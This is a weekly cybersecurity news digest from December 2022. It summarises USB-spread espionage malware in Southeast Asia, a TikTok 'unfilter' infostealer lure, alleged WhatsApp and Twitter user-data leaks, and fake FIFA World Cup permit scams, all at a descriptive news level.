2 Dec 2022 | Asia Cyber Summary

In the spotlight this week:

• China-Based Hackers Target Southeast Asia With USB-Based Malware
• Hackers Using Trending TikTok 'Invisible Challenge' to Spread Malware
• Hacker Attempts to Sell Data of 500 Million WhatsApp Users on the Dark Web
• 5.5 Million Users Impacted by Zero-Day Twitter Hack
• Hackers Selling Fake Permit Documents, Digital Coins for FIFA World Cup
  ‍

China-Based Hackers Target Southeast Asia With USB-Based Malware

‍China-based hackers have been spotted conducting cyber espionage, by using USB devices as an initial infection vector, to target public and private entities in Southeast Asia. A successful compromise led to the deployment of a renamed NCAT binary and execution of a reverse shell on the victim’s system, providing backdoor access to the threat actor. The malware then self-replicates by infecting new removable drives that are plugged into a compromised system. The malicious payloads are then propagated to additional systems to potentially collect data from them.

Hackers Using Trending TikTok 'Invisible Challenge' to Spread Malware

Threat actors are taking advantage of a well-known TikTok challenge to deceive users into installing malware that steals their personal information. The trend, called Invisible Challenge, involves applying a filter known as Invisible Body that just leaves behind a silhouette of the person's body. But the fact that individuals filming such videos could be undressed has led to a nefarious scheme wherein the attackers post TikTok videos with links to rogue software dubbed "unfilter" that purport to remove the applied filters. Instructions to obtain the “unfilter” software then deploys malware designed to steal users’ passwords, Discord accounts, cryptocurrency wallets, and other sensitive information.

Hacker Attempts to Sell Data of 500 Million WhatsApp Users on the Dark Web

A threat actor has allegedly uploaded a dataset to the dark web which contains the private data of approximately 500 million WhatsApp users. The threat actor claimed to be selling up-to-date personal information of 487 million WhatsApp users from 84 countries. This information was released just a few days after it was claimed that Meta, the parent company of WhatsApp, had dismissed staff members for allegedly violating Facebook's terms of service by breaking into users' accounts. Meta has since denied the data leak. 

5.5 Million Users Impacted by Zero-Day Twitter Hack

A zero-day hack has affected at least 5 million Twitter users, but there may be more than 20 million affected overall. Twitter acknowledged on August 5, 2022, that a threat actor had compiled a database of user data using a zero-day vulnerability. According to Twitter, this vulnerability was patched in January 2022. However, according to cyber security researchers, the database which contains the non-public information of more than 5 million people, is now freely available on a breached data marketplace forum. It was also reported that the same vulnerability was used to establish a second database, potentially containing 17 million records.

Hackers Selling Fake Permit Documents, Digital Coins for FIFA World Cup

Cyber Security experts cautioned on Monday that threat actors are selling bogus Hayya cards, which are essentially permit documents, to fans who are willing to pay any price to obtain one as the FIFA World Cup is presently taking place in Qatar. Hayya cards must be presented alongside an original FIFA World Cup ticket in order to gain entry into the stadium. In order to purchase the fake Hayya cards, threat actors ask for the victim's personal information such as a valid passport ID, and payment in Bitcoin. Threat actors are also sharing hacking techniques that purportedly allow one to register for a Hayya card without a valid FIFA ticket number, for free.